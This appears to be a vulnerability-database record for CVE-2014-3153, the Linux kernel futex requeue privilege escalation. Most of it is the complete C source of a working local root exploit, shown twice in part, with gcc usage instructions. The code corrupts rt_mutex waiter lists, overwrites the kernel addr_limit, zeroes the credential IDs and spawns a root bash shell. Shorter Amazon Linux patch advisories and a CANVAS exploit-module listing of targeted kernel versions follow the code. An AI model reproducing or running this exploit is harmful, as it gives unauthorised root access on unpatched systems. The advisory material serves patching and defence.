&act, NULL);\r\n\r\n\talarm(3);\r\n\twhile (*do_request == 0) {\r\n\t\tif (int_sync_time_out)\r\n\t\t\treturn -1;\r\n\t}\r\n\t\r\n\talarm(0);\r\n\tvcscnt = read_voluntary_ctxt_switches(pid);\r\n\t*did_request = 1;\r\n\twhile (read_voluntary_ctxt_switches(pid) != vcscnt + 1) {\r\n \tusleep(10);\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\nstatic void sync_with_parent(int volatile *do_request, int volatile *did_request)\r\n{\r\n\t*do_request = 1;\r\n\twhile (*did_request == 0) { }\r\n}\r\n\r\nvoid fix_rt_mutex_waiter_list(struct rt_mutex *pmutex)\r\n{\r\n\tstruct rt_mutex_waiter *pwaiter6, *pwaiter7;\r\n\tstruct rt_mutex_waiter waiter6, waiter7;\r\n\tstruct rt_mutex mutex;\r\n\tif(!pmutex) \r\n\t\treturn;\r\n\tread_pipe(pmutex, &mutex, sizeof(mutex));\r\n\tpwaiter6 = 
NODE_LIST_TO_WAITER(mutex.wait_list.node_list.next);\r\n\tif(!pwaiter6) \r\n\t\treturn;\r\n\tread_pipe(pwaiter6, &waiter6, sizeof(waiter6));\r\n\tpwaiter7 = NODE_LIST_TO_WAITER(waiter6.list_entry.node_list.next);\r\n\tif(!pwaiter7) \r\n\t\treturn;\r\n\tread_pipe(pwaiter7, &waiter7, sizeof(waiter7));\r\n\t\r\n\twaiter6.list_entry.prio_list.prev = waiter6.list_entry.prio_list.next;\r\n\twaiter7.list_entry.prio_list.next = waiter7.list_entry.prio_list.prev;\r\n\tmutex.wait_list.node_list.prev = waiter6.list_entry.node_list.next;\r\n\twaiter7.list_entry.node_list.next = waiter6.list_entry.node_list.prev;\r\n\t\r\n\twrite_pipe(pmutex, &mutex, sizeof(mutex));\r\n\twrite_pipe(pwaiter6, &waiter6, sizeof(waiter6));\r\n\twrite_pipe(pwaiter7, &waiter7, sizeof(waiter7));\r\n}\r\n\r\nstatic void void_handler(int signum)\r\n{\r\n\tpthread_exit(0);\r\n}\r\n\r\nstatic void kernel_hack_task(int signum)\r\n{\r\n\tstruct rt_mutex *prt_mutex, rt_mutex;\r\n\tstruct rt_mutex_waiter rt_waiter11;\r\n\tint tid = syscall(__NR_gettid);\r\n\tint pid = getpid();\r\n\r\n\tset_parent_cred(hack_thread_stack, main_pid);\r\n\t\r\n\tread_pipe(pwaiter11, (void *)&rt_waiter11, sizeof(rt_waiter11));\r\n\t\r\n\tprt_mutex = rt_waiter11.lock;\r\n\tread_pipe(prt_mutex, (void *)&rt_mutex, sizeof(rt_mutex));\r\n\t\r\n\tvoid *ptask_struct = rt_mutex.owner;\r\n\tptask_struct = (void *)((long)ptask_struct & ~ 0xF);\r\n\tint len = read_pipe(ptask_struct, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n\tint *ppid = (int *)(task_struct_buf + OFFSET_PID);\r\n\tvoid **pstack = (void **)&task_struct_buf[8];\r\n\tvoid *owner_sp = *pstack;\r\n\tset_addr_limit(owner_sp);\r\n\r\n\tpthread_mutex_lock(&hacked_lock);\r\n\tpthread_cond_signal(&hacked);\r\n\tpthread_mutex_unlock(&hacked_lock);\r\n}\r\n\r\nstatic void *call_futex_lock_pi_with_priority(void *arg)\r\n{\r\n\tint prio;\r\n\tstruct sigaction act;\r\n\tint ret;\r\n\t\r\n\tprio = (long)arg;\r\n\tlast_tid = 
syscall(__NR_gettid);\r\n\t\r\n\tpthread_mutex_lock(&is_thread_desched_lock);\r\n\tpthread_cond_signal(&is_thread_desched);\r\n\t\r\n\tact.sa_handler = void_handler;\r\n\tsigemptyset(&act.sa_mask);\r\n\tact.sa_flags = 0;\r\n\tact.sa_restorer = NULL;\r\n\tsigaction(SIGNAL_THREAD_EXIT, &act, NULL);\r\n\t\r\n\tact.sa_handler = kernel_hack_task;\r\n\tsigemptyset(&act.sa_mask);\r\n\tact.sa_flags = 0;\r\n\tact.sa_restorer = NULL;\r\n\tsigaction(SIGNAL_HACK_KERNEL, &act, NULL);\r\n\t\r\n\tsetpriority(PRIO_PROCESS, 0, prio);\r\n\t\r\n\tpthread_mutex_unlock(&is_thread_desched_lock);\r\n\t\r\n\tsync_with_parent(&do_dm_tid_read, &did_dm_tid_read);\r\n\t\r\n\tret = syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);\r\n\t\r\n\treturn NULL;\r\n}\r\n\r\nstatic pthread_t create_thread_do_futex_lock_pi_with_priority(int prio)\r\n{\r\n\tpthread_t th4;\r\n\tpid_t pid;\r\n\t\r\n\tdo_dm_tid_read = 0;\r\n\tdid_dm_tid_read = 0;\r\n\t\r\n\tpthread_mutex_lock(&is_thread_desched_lock);\r\n\tpthread_create(&th4, 0, call_futex_lock_pi_with_priority, (void *)(long)prio);\r\n\tpthread_cond_wait(&is_thread_desched, &is_thread_desched_lock);\r\n\t\r\n\tpid = last_tid;\r\n\t\r\n\tsync_with_child(pid, &do_dm_tid_read, &did_dm_tid_read);\r\n\t\r\n\tpthread_mutex_unlock(&is_thread_desched_lock);\r\n\t\r\n\treturn th4;\r\n}\r\n\r\nstatic int server_for_setup_rt_waiter(void)\r\n{\r\n\tint sockfd;\r\n\tint yes = 1;\r\n\tstruct sockaddr_in addr = {0};\r\n\t\r\n\tsockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\r\n\t\r\n\tsetsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes));\r\n\t\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(LOCAL_PORT);\r\n\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n\tbind(sockfd, (struct sockaddr *)&addr, sizeof(addr));\r\n\t\r\n\tlisten(sockfd, 1);\r\n\tlistenfd = sockfd;\r\n\t\r\n\treturn accept(sockfd, NULL, NULL);\r\n}\r\n\r\nstatic int connect_server_socket(void)\r\n{\r\n\tint sockfd;\r\n\tstruct sockaddr_in addr = {0};\r\n\tint 
ret;\r\n\tint sock_buf_size;\r\n\t\r\n\tsockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\r\n\tif (sockfd < 0) {\r\n\t\tprintf(\"socket failed\\n\");\r\n\t\tusleep(10);\r\n\t} else {\r\n\t\taddr.sin_family = AF_INET;\r\n\t\taddr.sin_port = htons(LOCAL_PORT);\r\n\t\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n\t}\r\n\t\r\n\twhile (connect(sockfd, (struct sockaddr *)&addr, 16) < 0) {\r\n\t\tusleep(10);\r\n\t}\r\n\t\r\n\tsock_buf_size = 1;\r\n\tsetsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size));\r\n\t\r\n\treturn sockfd;\r\n}\r\n\r\nunsigned long iov_base0, iov_basex;\r\nsize_t iov_len0, iov_lenx;\r\n\r\nstatic void *client_to_setup_rt_waiter(void *waiter_plist)\r\n{\r\n\tint sockfd;\r\n\tstruct mmsghdr msgvec[1];\r\n\tstruct iovec msg_iov[8];\r\n\tunsigned long databuf[0x20];\r\n\tint i;\r\n\tint ret;\r\n\tstruct sigaction act;\r\n\t\r\n\tact.sa_handler = void_handler;\r\n\tsigemptyset(&act.sa_mask);\r\n\tact.sa_flags = 0;\r\n\tact.sa_restorer = NULL;\r\n\tsigaction(SIGNAL_THREAD_EXIT, &act, NULL);\r\n\t\r\n\twaiter_thread_tid = syscall(__NR_gettid);\r\n\tsetpriority(PRIO_PROCESS, 0, 12);\r\n\t\r\n\tsockfd = connect_server_socket();\r\n\tclientfd = sockfd;\r\n\t\r\n\tfor (i = 0; i < ARRAY_SIZE(databuf); i++) {\r\n\tdatabuf[i] = (unsigned long)waiter_plist;\r\n\t}\r\n\t\r\n\tfor (i = 0; i < ARRAY_SIZE(msg_iov); i++) {\r\n\tmsg_iov[i].iov_base = waiter_plist;\r\n\tmsg_iov[i].iov_len = (long)waiter_plist;\r\n\t}\r\n\tmsg_iov[1].iov_base = (void *)iov_base0;\r\n\t\r\n\tmsgvec[0].msg_hdr.msg_name = databuf;\r\n\tmsgvec[0].msg_hdr.msg_namelen = sizeof databuf;\r\n\tmsgvec[0].msg_hdr.msg_iov = msg_iov;\r\n\tmsgvec[0].msg_hdr.msg_iovlen = ARRAY_SIZE(msg_iov);\r\n\tmsgvec[0].msg_hdr.msg_control = databuf;\r\n\tmsgvec[0].msg_hdr.msg_controllen = ARRAY_SIZE(databuf);\r\n\tmsgvec[0].msg_hdr.msg_flags = 0;\r\n\tmsgvec[0].msg_len = 0;\r\n\t\r\n\tsyscall(__NR_futex, &swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &swag2, 
0);\r\n\t\r\n\tsync_with_parent(&do_socket_tid_read, &did_socket_tid_read);\r\n\t\r\n\tret = 0;\r\n\t\r\n\twhile (1) {\r\n\tret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0);\r\n\tif (ret <= 0) {\r\n\t\tbreak;\r\n\t} else \r\n\t\tprintf(\"sendmmsg ret %d\\n\", ret);\r\n\t}\r\n\treturn NULL;\r\n}\r\n\r\nstatic void plist_set_next(struct list_head *node, struct list_head *head)\r\n{\r\n\tnode->next = head;\r\n\thead->prev = node;\r\n\tnode->prev = head;\r\n\thead->next = node;\r\n}\r\n\r\nstatic void setup_waiter_params(struct rt_mutex_waiter *rt_waiters)\r\n{\r\n\trt_waiters[0].list_entry.prio = USER_PRIO_BASE + 9;\r\n\trt_waiters[1].list_entry.prio = USER_PRIO_BASE + 13;\r\n\tplist_set_next(&rt_waiters[0].list_entry.prio_list, &rt_waiters[1].list_entry.prio_list);\r\n\tplist_set_next(&rt_waiters[0].list_entry.node_list, &rt_waiters[1].list_entry.node_list);\r\n}\r\n\r\nstatic bool do_exploit(void *waiter_plist)\r\n{\r\n\tvoid *magicval, *magicval2;\r\n\tstruct rt_mutex_waiter *rt_waiters;\r\n\tpid_t pid;\r\n\tpid_t pid6, pid7, pid12, pid11;\r\n\t\r\n\trt_waiters = PRIO_LIST_TO_WAITER(waiter_plist);\r\n\t\r\n\tsyscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);\r\n\t\r\n\twhile (syscall(__NR_futex, &swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag) != 1) {\r\n\t\tusleep(10);\r\n\t}\r\n\t\r\n\tpthread_t th6 = create_thread_do_futex_lock_pi_with_priority(6);\r\n\tpthread_t th7 = create_thread_do_futex_lock_pi_with_priority(7);\r\n\t\r\n\tswag2 = 0;\r\n\tdo_socket_tid_read = 0;\r\n\tdid_socket_tid_read = 0;\r\n\t\r\n\tsyscall(__NR_futex, &swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag2);\r\n\t\r\n\tif (sync_with_child_getchar(waiter_thread_tid, &do_socket_tid_read, &did_socket_tid_read) < 0) {\r\n\treturn false;\r\n\t}\r\n\t\r\n\tsetup_waiter_params(rt_waiters);\r\n\tmagicval = rt_waiters[0].list_entry.prio_list.next;\r\n\tprintf(\"Checking whether exploitable..\");\r\n\tpthread_t th11 = create_thread_do_futex_lock_pi_with_priority(11);\r\n\t\r\n\tif 
(rt_waiters[0].list_entry.prio_list.next == magicval) {\r\n\t\tprintf(\"failed\\n\");\r\n\t\treturn false;\r\n\t}\r\n\tprintf(\"OK\\nSeaching good magic...\\n\");\r\n\tmagicval = rt_waiters[0].list_entry.prio_list.next;\r\n\t\r\n\tpthread_cancel_immediately(th11);\r\n\t\r\n\tpthread_t th11_1, th11_2;\r\n\twhile(1) {\r\n\t\tsetup_waiter_params(rt_waiters);\r\n\t\tth11_1 = create_thread_do_futex_lock_pi_with_priority(11);\r\n\t\tmagicval = rt_waiters[0].list_entry.prio_list.next;\r\n\t\thack_thread_stack = (struct thread_info *)((unsigned long)magicval & 0xffffffffffffe000);\r\n\t\trt_waiters[1].list_entry.node_list.prev = (void *)&hack_thread_stack->addr_limit;\r\n\t\t\r\n\t\tth11_2 = create_thread_do_futex_lock_pi_with_priority(11);\r\n\t\tmagicval2 = rt_waiters[1].list_entry.node_list.prev;\r\n\t\t\r\n\t\tprintf(\"magic1=%p magic2=%p\\n\", magicval, magicval2);\r\n\t\tif(magicval < magicval2) {\r\n\t\t\tprintf(\"Good magic found\\nHacking...\\n\");\r\n\t\t\tbreak;\r\n\t\t} else {\r\n\t\t\tpthread_cancel_immediately(th11_1);\r\n\t\t\tpthread_cancel_immediately(th11_2);\r\n\t\t}\t\t\r\n\t}\r\n\tpwaiter11 = NODE_LIST_TO_WAITER(magicval2);\r\n\tpthread_mutex_lock(&hacked_lock);\r\n\tpthread_kill(th11_1, SIGNAL_HACK_KERNEL);\r\n\tpthread_cond_wait(&hacked, &hacked_lock);\r\n\tpthread_mutex_unlock(&hacked_lock);\r\n\tclose(listenfd);\r\n\t\r\n\tstruct rt_mutex_waiter waiter11;\r\n\tstruct rt_mutex *pmutex;\r\n\tint len = read_pipe(pwaiter11, &waiter11, sizeof(waiter11));\r\n\tif(len != sizeof(waiter11)) {\r\n\t\tpmutex = NULL;\r\n\t} else {\r\n\t\tpmutex = waiter11.lock;\r\n\t}\r\n\tfix_rt_mutex_waiter_list(pmutex);\r\n\t\r\n\tpthread_cancel_immediately(th11_1);\r\n\tpthread_cancel_immediately(th11_2);\r\n\t\r\n\tpthread_cancel_immediately(th7);\r\n\tpthread_cancel_immediately(th6);\r\n\tclose(clientfd);\r\n\tpthread_cancel_immediately(thread_client_to_setup_rt_waiter);\r\n\t\r\n\texit(0);\r\n}\r\n\r\n#define MMAP_ADDR_BASE\t0x0c000000\r\n#define 
MMAP_LEN\t\t0x0c001000\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tunsigned long mapped_address;\r\n\tvoid *waiter_plist;\r\n\t\r\n\tprintf(\"CVE-2014-3153 exploit by Chen Kaiqu(kaiquchen@163.com)\\n\");\r\n \r\n\tmain_pid = gettid();\r\n\tif(fork() == 0) {\r\n\t\tiov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\r\n\t\tif (iov_base0 < 0xb0000000) {\r\n\t\t\tprintf(\"mmap failed?\\n\");\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t\tiov_len0 = 0x10000;\r\n\t\t\r\n\t\tiov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\r\n\t\tif (iov_basex < MMAP_ADDR_BASE) {\r\n\t\t\tprintf(\"mmap failed?\\n\");\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t\tiov_lenx = MMAP_LEN;\r\n\t\t\r\n\t\twaiter_plist = (void *)iov_basex + 0x400;\r\n\t\tpthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist);\r\n\t\t\r\n\t\tsockfd = server_for_setup_rt_waiter();\r\n\t\tif (sockfd < 0) {\r\n\t\t\tprintf(\"Server failed\\n\");\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t\t\r\n\t\tif (!do_exploit(waiter_plist)) {\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t\treturn 0;\r\n\t}\r\n\r\n\twhile(getuid())\r\n\t\tusleep(100);\r\n\texecl(\"/bin/bash\", \"bin/bash\", NULL);\r\n\treturn 0;\r\n}\r\n\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35370/"}], "amazon": [{"lastseen": "2020-11-10T12:35:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "**Issue Overview:**\n\nThe futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.\n\n \n**Affected Packages:** 
\n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-debuginfo-common-i686-3.10.42-52.145.amzn1.i686 \n kernel-3.10.42-52.145.amzn1.i686 \n perf-debuginfo-3.10.42-52.145.amzn1.i686 \n kernel-devel-3.10.42-52.145.amzn1.i686 \n kernel-debuginfo-3.10.42-52.145.amzn1.i686 \n kernel-headers-3.10.42-52.145.amzn1.i686 \n perf-3.10.42-52.145.amzn1.i686 \n \n noarch: \n kernel-doc-3.10.42-52.145.amzn1.noarch \n \n src: \n kernel-3.10.42-52.145.amzn1.src \n \n x86_64: \n kernel-3.10.42-52.145.amzn1.x86_64 \n perf-3.10.42-52.145.amzn1.x86_64 \n perf-debuginfo-3.10.42-52.145.amzn1.x86_64 \n kernel-headers-3.10.42-52.145.amzn1.x86_64 \n kernel-devel-3.10.42-52.145.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.10.42-52.145.amzn1.x86_64 \n kernel-debuginfo-3.10.42-52.145.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-06-15T16:30:00", "published": "2014-06-15T16:30:00", "id": "ALAS-2014-363", "href": "https://alas.aws.amazon.com/ALAS-2014-363.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:35:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1739", "CVE-2014-0196", "CVE-2014-3153"], "description": "**Issue Overview:**\n\nThe media_device_enum_entities function in drivers/media/media-device.c in the Linux kernel before 3.14.6 does not initialize a certain data structure, which allows local users to obtain sensitive information from kernel memory by leveraging /dev/media0 read access for a MEDIA_IOC_ENUM_ENTITIES ioctl call. \n\nA flaw was found in the way the Linux kernel's futex subsystem handled the requeuing of certain Priority Inheritance (PI) futexes. A local, unprivileged user could use this flaw to escalate their privileges on the system. 
\n\nThe n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the \"LECHO & !OPOST\" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings. \n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-debuginfo-3.10.53-56.140.amzn1.i686 \n kernel-headers-3.10.53-56.140.amzn1.i686 \n perf-3.10.53-56.140.amzn1.i686 \n kernel-3.10.53-56.140.amzn1.i686 \n kernel-debuginfo-3.10.53-56.140.amzn1.i686 \n kernel-debuginfo-common-i686-3.10.53-56.140.amzn1.i686 \n kernel-devel-3.10.53-56.140.amzn1.i686 \n \n noarch: \n kernel-doc-3.10.53-56.140.amzn1.noarch \n \n src: \n kernel-3.10.53-56.140.amzn1.src \n \n x86_64: \n kernel-headers-3.10.53-56.140.amzn1.x86_64 \n kernel-3.10.53-56.140.amzn1.x86_64 \n kernel-debuginfo-3.10.53-56.140.amzn1.x86_64 \n kernel-devel-3.10.53-56.140.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.10.53-56.140.amzn1.x86_64 \n perf-3.10.53-56.140.amzn1.x86_64 \n perf-debuginfo-3.10.53-56.140.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-08-21T11:03:00", "published": "2014-08-21T11:03:00", "id": "ALAS-2014-392", "href": "https://alas.aws.amazon.com/ALAS-2014-392.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T19:48:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "edition": 2, "description": "**Name**| linux_futex_requeue \n---|--- \n**CVE**| CVE-2014-3153 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Futex Requeue Privilege Escalation Exploit \n**Notes**| 
Repeatability: Multiple times \nNotes: \n\\- Supported 64bit kernels: \n3.11.0-[13-22]-generic - Ubuntu saucy 13.10 \n3.11.0-[13-22]-generic - Ubuntu precise 12.04 \n3.13.0-[24-27]-generic - Ubuntu trusty 14.04 \n3.13.0-[24-27]-generic - Ubuntu precise 12.04 \n3.2.0-[23-63]-generic - Ubuntu precise 12.04 \n3.5.0-[19-49]-generic - Ubuntu precise 12.04 \n3.8.0-[19-41]-generic - Ubuntu precise 12.04 \n \n\\- Supported 32bit kernels: \n3.11.0-[13-22]-generic - Ubuntu saucy 13.10 \n3.11.0-[13-22]-generic - Ubuntu precise 12.04 \n3.13.0-[24-27]-generic - Ubuntu trusty 14.04 \n3.13.0-[24-27]-generic - Ubuntu precise 12.04 \n3.2.0-23-generic - Ubuntu precose 12.04 \n3.2.0-[33-63]-generic - Ubuntu precise 12.04 \n3.2.0-23-generic-pae - Ubuntu precise pae 12.04 \n3.2.0-[33-63]-generic-pae - Ubuntu precise pae 12.04 \n3.5.0-[19-49]-generic - Ubuntu precise 12.04 \n3.5.0-[19-49]-generic - Ubuntu quantal 12.10 \n3.8.0-[19-41]-generic - Ubuntu precise 12.04 \n3.8.0-[19-41]-generic - Ubuntu raring 13.04 \n2.6.32-220.*el6.i686 - Centos/RH6 \n2.6.32-279.*el6.i686 - Centos/RH6 \n2.6.32-358.*el6.i686 - Centos/RH6 \n2.6.32-431.*el6.i686 - Centos/RH6 \n \n \nVENDOR: Linux \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153 \nCVE Name: CVE-2014-3153 \n\n", "modified": "2014-06-07T14:55:00", "published": "2014-06-07T14:55:00", "id": "LINUX_FUTEX_REQUEUE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/linux_futex_requeue", "type": "canvas", "title": "Immunity Canvas: LINUX_FUTEX_REQUEUE", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.14.5 (CentOS 7 RHEL) - libfutex Local Privilege Escalation", "edition": 1, "published": "2014-11-25T00:00:00", "title": "Linux Kernel 3.14.5 (CentOS 7 RHEL) - libfutex Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2014-11-25T00:00:00", 
"id": "EXPLOITPACK:6D7A39DDD9FCE730C1AA0BD07808752A", "href": "", "sourceData": "/*\n * CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406\n * By Kaiqu Chen ( kaiquchen@163.com )\n * Based on libfutex and the expoilt for Android by GeoHot.\n *\n * Usage:\n * $gcc exploit.c -o exploit -lpthread\n * $./exploit\n *\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <stdbool.h>\n#include <pthread.h>\n#include <fcntl.h>\n#include <signal.h>\n#include <string.h>\n#include <errno.h>\n#include <linux/futex.h>\n#include <sys/socket.h>\n#include <sys/mman.h>\n#include <sys/syscall.h>\n#include <sys/resource.h>\n#include <arpa/inet.h>\n#include <netinet/in.h> \n#include <netinet/tcp.h> \n\n#define ARRAY_SIZE(a)\t(sizeof (a) / sizeof (*(a)))\n\n#define FUTEX_WAIT_REQUEUE_PI 11\n#define FUTEX_CMP_REQUEUE_PI 12\n#define USER_PRIO_BASE 120\n#define LOCAL_PORT 5551\n\n#define SIGNAL_HACK_KERNEL 12\n#define SIGNAL_THREAD_EXIT 10\n\n#define OFFSET_PID\t\t\t0x4A4 \n#define OFFSET_REAL_PARENT\t0x4B8\n#define OFFSET_CRED\t\t\t0x668\n\n#define SIZEOF_CRED\t\t\t160\n#define SIZEOF_TASK_STRUCT\t2912\n#define OFFSET_ADDR_LIMIT\t0x20\n\n#define PRIO_LIST_OFFSET\t8\t\n#define NODE_LIST_OFFSET\t(PRIO_LIST_OFFSET + sizeof(struct list_head))\n#define PRIO_LIST_TO_WAITER(list) (((void *)(list)) - PRIO_LIST_OFFSET)\n#define WAITER_TO_PRIO_LIST(waiter) (((void *)(waiter)) + PRIO_LIST_OFFSET)\n#define NODE_LIST_TO_WAITER(list) (((void *)(list)) - NODE_LIST_OFFSET)\n#define WAITER_TO_NODE_LIST(waiter) (((void *)(waiter)) + NODE_LIST_OFFSET)\n#define MUTEX_TO_PRIO_LIST(mutex) (((void *)(mutex)) + sizeof(long))\n#define MUTEX_TO_NODE_LIST(mutex) (((void *)(mutex)) + sizeof(long) + sizeof(struct list_head))\n\n////////////////////////////////////////////////////////////////////\nstruct task_struct;\n\nstruct thread_info {\n struct task_struct *task;\n void *exec_domain;\n int flags;\n int status;\n int cpu;\n int preempt_count;\n void *addr_limit;\n};\n\nstruct list_head {\n 
struct list_head *next;\n struct list_head *prev;\n};\n\nstruct plist_head {\n\tstruct list_head node_list;\n};\n\nstruct plist_node {\n int prio;\n struct list_head prio_list;\n struct list_head node_list;\n};\n\nstruct rt_mutex {\n\tunsigned long\t\twait_lock;\n\tstruct plist_head\twait_list;\n\tstruct task_struct\t*owner;\n};\n\nstruct rt_mutex_waiter {\n struct plist_node list_entry;\n struct plist_node pi_list_entry;\n struct task_struct *task;\n struct rt_mutex *lock;\n};\n\nstruct mmsghdr {\n struct msghdr msg_hdr;\n unsigned int msg_len;\n};\n\nstruct cred {\n\tint\tusage;\n\tint\tuid;\t\t/* real UID of the task */\n\tint\tgid;\t\t/* real GID of the task */\n\tint\tsuid;\t\t/* saved UID of the task */\n\tint\tsgid;\t\t/* saved GID of the task */\n\tint\teuid;\t\t/* effective UID of the task */\n\tint\tegid;\t\t/* effective GID of the task */\n\tint\tfsuid;\t\t/* UID for VFS ops */\n\tint\tfsgid;\t\t/* GID for VFS ops */\n};\n\n////////////////////////////////////////////////////////////////////\n\nstatic int swag = 0;\nstatic int swag2 = 0;\nstatic int main_pid;\n\nstatic pid_t waiter_thread_tid;\n\nstatic pthread_mutex_t hacked_lock;\nstatic pthread_cond_t hacked;\n\nstatic pthread_mutex_t done_lock;\nstatic pthread_cond_t done;\n\nstatic pthread_mutex_t is_thread_desched_lock;\nstatic pthread_cond_t is_thread_desched;\n\nstatic volatile int do_socket_tid_read = 0;\nstatic volatile int did_socket_tid_read = 0;\n\nstatic volatile int do_dm_tid_read = 0;\nstatic volatile int did_dm_tid_read = 0;\n\nstatic pid_t last_tid = 0;\n\nstatic volatile int_sync_time_out = 0;\n\nstruct thread_info thinfo;\nchar task_struct_buf[SIZEOF_TASK_STRUCT];\nstruct cred cred_buf;\n\nstruct thread_info *hack_thread_stack = NULL;\n\npthread_t thread_client_to_setup_rt_waiter;\n\nint listenfd;\nint sockfd;\nint clientfd;\n\n////////////////////////////////////////////////////////////////\nint gettid()\n{\n\treturn syscall(__NR_gettid);\n}\n\nssize_t read_pipe(void *kbuf, void 
*ubuf, size_t count) {\n\tint pipefd[2];\n\tssize_t len;\n\n\tpipe(pipefd);\n\n\tlen = write(pipefd[1], kbuf, count);\n\n\tif (len != count) {\n\t\tprintf(\"Thread %d failed in reading @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\n\t\twhile(1) { sleep(10); }\n\t}\n\n\tread(pipefd[0], ubuf, count);\n\n\tclose(pipefd[0]);\n\tclose(pipefd[1]);\n\n\treturn len;\n}\n\nssize_t write_pipe(void *kbuf, void *ubuf, size_t count) {\n\tint pipefd[2];\n\tssize_t len;\n\n\tpipe(pipefd);\n\n\twrite(pipefd[1], ubuf, count);\n\tlen = read(pipefd[0], kbuf, count);\n\n\tif (len != count) {\n\t\tprintf(\"Thread %d failed in writing @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\n\t\twhile(1) { sleep(10); }\n\t}\n\n\tclose(pipefd[0]);\n\tclose(pipefd[1]);\n\n\treturn len;\n}\n\nint pthread_cancel_immediately(pthread_t thid)\n{\n\tpthread_kill(thid, SIGNAL_THREAD_EXIT);\n\tpthread_join(thid, NULL);\n\treturn 0;\n}\n\nvoid set_addr_limit(void *sp)\n{\n\tlong newlimit = -1;\n\twrite_pipe(sp + OFFSET_ADDR_LIMIT, (void *)&newlimit, sizeof(long));\n}\n\nvoid set_cred(struct cred *kcred)\n{\n\tstruct cred cred_buf;\n\tint len;\n\n\tlen = read_pipe(kcred, &cred_buf, sizeof(cred_buf));\n\tcred_buf.uid = cred_buf.euid = cred_buf.suid = cred_buf.fsuid = 0;\n\tcred_buf.gid = cred_buf.egid = cred_buf.sgid = cred_buf.fsgid = 0;\n\tlen = write_pipe(kcred, &cred_buf, sizeof(cred_buf));\n}\n\nstruct rt_mutex_waiter *pwaiter11;\n\nvoid set_parent_cred(void *sp, int parent_tid)\n{\n\tint len;\n\tint tid;\n\tstruct task_struct *pparent;\n\tstruct cred *pcred;\n\t\n\tset_addr_limit(sp);\n\t\n\tlen = read_pipe(sp, &thinfo, sizeof(thinfo));\n\tif(len != sizeof(thinfo)) {\n\t\tprintf(\"Read %p error %d\\n\", sp, len);\n\t}\n\t\n\tvoid *ptask = thinfo.task;\n\tlen = read_pipe(ptask, task_struct_buf, SIZEOF_TASK_STRUCT);\n\ttid = *(int *)(task_struct_buf + OFFSET_PID);\n\n\twhile(tid != 0 && tid != parent_tid) {\n\t\tpparent = *(struct task_struct **)(task_struct_buf + 
